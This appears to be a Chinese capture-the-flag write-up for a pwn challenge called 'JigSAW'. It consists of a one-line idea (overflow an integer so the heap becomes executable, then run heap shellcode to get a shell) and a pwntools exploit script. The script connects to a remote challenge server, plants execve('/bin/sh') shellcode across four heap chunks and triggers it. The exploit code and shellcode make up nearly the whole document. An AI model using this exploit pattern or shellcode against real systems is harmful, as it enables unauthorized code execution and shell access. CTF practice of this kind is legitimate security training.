解题思路
溢出整型变量使得堆可执行,然后执行堆上shellcode,getshell
exp
来自luckyu师傅的exp
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
p = process('./JigSAW')
context.arch = "amd64"
#,env={"LD_PRELOAD":"./libc.so.6"})
libc = ELF("./libc.so")
p = remote("47.104.71.220", 10273)
def add(idx):
p.sendlineafter("Choice :", "1")
p.sendlineafter("Index? :", str(idx))
def show(idx):
p.sendlineafter("Choice :", "5")
p.sendlineafter("Index? :", str(idx))
def edit(idx, content):
p.sendlineafter("Choice :", "2")
p.sendlineafter("Index? :", str(idx))
p.sendafter("iNput:", content)
def free(idx):
p.sendlineafter("Choice :", "3")
p.sendlineafter("Index? :", str(idx))
def test(idx):
p.sendlineafter("Choice :", "4")
p.sendlineafter("Index? :", str(idx))
def exp():
shellcode1 = asm("mov rsp, rdx\nadd rsp, 0x20\npush rsp")
shellcode2 = asm("mov rax, 0x68732f6e69622f\nadd rsp, 0x20\npush rsp")
shellcode3 = asm("push rax\nmov rdi, rsp\nxor rsi, rsi\nadd rsp, 0x28\npush rsp")
shellcode4 = asm("xor rdx, rdx\nmov rax, 59\nsyscall\n")
print(len(shellcode1))
p.sendlineafter("Name:", "111")
p.sendlineafter("Choice:", str(0x100000000))
add(0)
add(1)
add(2)
add(3)
edit(0, shellcode1)
edit(1, shellcode2)
edit(2, shellcode3)
edit(3, shellcode4)
test(0)
p.interactive()
if __name__ == '__main__':
exp()
发表评论